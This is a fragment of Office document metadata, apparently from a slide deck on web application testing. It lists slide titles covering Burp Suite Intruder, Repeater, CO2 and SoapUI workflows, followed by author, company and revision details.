      <vt:lpstr>Snake Intruder – Free Version</vt:lpstr>
      <vt:lpstr>Snake Intruder – Free Version Results</vt:lpstr>
      <vt:lpstr>Web Services</vt:lpstr>
      <vt:lpstr>WSDLR</vt:lpstr>
      <vt:lpstr>Soap - Repeater</vt:lpstr>
      <vt:lpstr>CO2 – Generate User Names</vt:lpstr>
      <vt:lpstr>Intruder – Add Name List</vt:lpstr>
      <vt:lpstr>Intruder – Grep Extract </vt:lpstr>
      <vt:lpstr>Start Attack</vt:lpstr>
      <vt:lpstr>Intruder Results</vt:lpstr>
      <vt:lpstr>Soap UI – Wget WSDL</vt:lpstr>
      <vt:lpstr>Soap UI – Create New Project</vt:lpstr>
      <vt:lpstr>Soap UI – Add WSDL</vt:lpstr>
      <vt:lpstr>Soap UI – Default Request</vt:lpstr>
      <vt:lpstr>Soap UI – Use Proxy With Burp</vt:lpstr>
      <vt:lpstr>Soap UI – Send Request</vt:lpstr>
      <vt:lpstr>Engagement Tools</vt:lpstr>
      <vt:lpstr>Search</vt:lpstr>
      <vt:lpstr>Find Comments</vt:lpstr>
      <vt:lpstr>Find Scripts</vt:lpstr>
      <vt:lpstr>Find References</vt:lpstr>
      <vt:lpstr>Analyze Target</vt:lpstr>
      <vt:lpstr>Discover Target</vt:lpstr>
      <vt:lpstr>Schedule Task</vt:lpstr>
      <vt:lpstr>Simulate Manual Testing</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>MarkMonitor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Housley</dc:creator>
  <cp:lastModifiedBy>Housley, Mike</cp:lastModifiedBy>
  <cp:revision>265</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-18T23:27:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-02T06:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>